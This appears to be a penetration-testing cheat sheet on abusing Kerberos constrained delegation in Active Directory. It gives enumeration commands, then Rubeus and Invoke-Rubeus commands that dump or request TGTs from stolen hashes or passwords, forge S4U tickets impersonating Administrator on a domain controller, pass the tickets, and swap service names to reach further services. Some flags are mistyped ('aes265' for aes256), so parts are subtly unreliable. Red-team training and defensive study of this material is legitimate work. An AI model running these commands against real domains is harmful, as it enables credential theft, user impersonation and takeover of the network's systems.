Constrained Delegation

Constrained Delegation

Link: https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation

Requirements

Compromise of the Active Directory Object that is configured for "Trusted to Auth".

Explanation

Microsoft introduced Constrained Delegation in Windows Server 2003 to provide a more secure form of delegation compared to the high-risk Unconstrained Delegation.

With Constrained Delegation, administrators can specify the services or applications for which a server is allowed to act on behalf of a user, thereby limiting the attack surface. This feature can reduce the risk of an attacker impersonating a user and accessing resources that they are not authorized to access.

Enumeration

1) Powerview

Get computer Constrained Delegation

Get-DomainComputer -TrustedToAuth| Select DnsHostName,UserAccountControl,msds-allowedtodelegateto | FL

Get user Constrained Delegation

Get-DomainUser -TrustedToAuth

2) Powershell

Search both users and computers for Constrained Delegation

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Obtain TGT

1) Rubeus

Triage current tickets

Rubeus.exe triage

Dump the systems TGT

Rubeus.exe dump /luid:[LUID] /service:[krbtgt] /user:[Hostname] /nowrap

OR

If you have the NTLM hash for the compromised account

Rubeus.exe asktgt /user:[User] /ntlm:[NTLM Hash] OR /aes265[aes265 Hash]

If you have the aes265 hash for the compromised account

Rubeus.exe asktgt /user:[User] /aes265[aes265 Hash]

If you have the plain text password

rubeus.exe asktgt /user:[User] /password:[Password]

2) Invoke-Rubeus

Triage current tickets

Invoke-Rubeus -Command "triage"

Dump the systems TGT

Invoke-Rubeus -Command "dump /luid:[LUID] /service:[krbtgt] /user:[Hostname] /nowrap"

OR

If you have the NTLM hash for the compromised account

Invoke-Rubeus -Command "asktgt /user:[User] /ntlm:[NTLM Hash] OR /aes265[aes265 Hash]"

If you have the aes265 hash for the compromised account

Invoke-Rubeus -Command "asktgt /user:[User] /aes265[aes265 Hash]"

If you have the plain text password

Invoke-Rubeus -Command "asktgt /user:[User] /password:[Password]"

Obtain TGS for service

1) Rubeus

Use obtained TGT to request a TGS ticket for the delegated service and impersonate another user

Rubeus.exe s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /user:[User] /ticket:[Base64 ticket] /nowrap

Example

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.security.local /user:srv01$ /ticket:[Base64 ticket] /nowrap

2) Invoke-Rubeus

Use obtained TGT to request a TGS ticket for the delegated service and impersonate another user

Invoke-Rubeus -Command "s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /user:[User] /ticket:[Base64 ticket] /nowrap"

Example

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.security.local /user:srv01$ /ticket:[Base64 ticket] /nowrap"

Pass the Ticket (PtT)

1) Rubeus

Method 1: Pass ticket into seperate session (Preffered)

Create new LUID session (Requires Elevation)

Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /show

Pass ticket into new session

Rubeus.exe ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]

Method 2: Pass ticket directly into current session (Can cause auth issues)

Rubeus.exe ptt /ticket:[Base64 ticket]

2) Invoke-Rubeus

Method 1: Pass ticket into seperate session (Preffered)

Create new LUID session (Requires Elevation)

Invoke-Rubeus -Command "createnetonly /program:c:\windows\system32\cmd.exe /show"

Pass ticket into new session

Invoke-Rubeus -Command "ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]"

Method 2: Pass ticket directly into current session (Can cause auth issues)

Invoke-Rubeus -Command "ptt /ticket:[Base64 ticket]"

Alternate Service Name

Kerberos uses a Service Principal Name (SPN) to identify a service during authentication, which is typically a combination of the service name and the host's name where the service is running. Rubeus.exe includes an option called /altservicename that enables an attacker to use a different service name when constructing the SPN. This option can be helpful in certain situations, such as when the default service name is unavailable or the attacker wants to target a specific service.

Generate TGS for the alternative service name

1) Rubeus

Rubeus.exe s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /altservice:[Alternate-Service] /user:[User] /ticket:[Base64 ticket] /nowrap

Example

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.security.local /altservice:ldap /user:srv01$ /ticket:[Base64 ticket] /nowrap

2) Invoke-Rubeus

Invoke-Rubeus -Command "s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /altservice:[Alternate-Service] /user:[User] /ticket:[Base64 ticket] /nowrap"

Example

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.security.local /altservice:ldap /user:srv01$ /ticket:[Base64 ticket] /nowrap"

Generate service tickets for all service types

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:http/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:host/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:ldap/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:wsman/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:mssql/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /self /altservice:rpcss/dc01.security.local /user:srv01$ /ticket:$ticket /nowrap /ptt"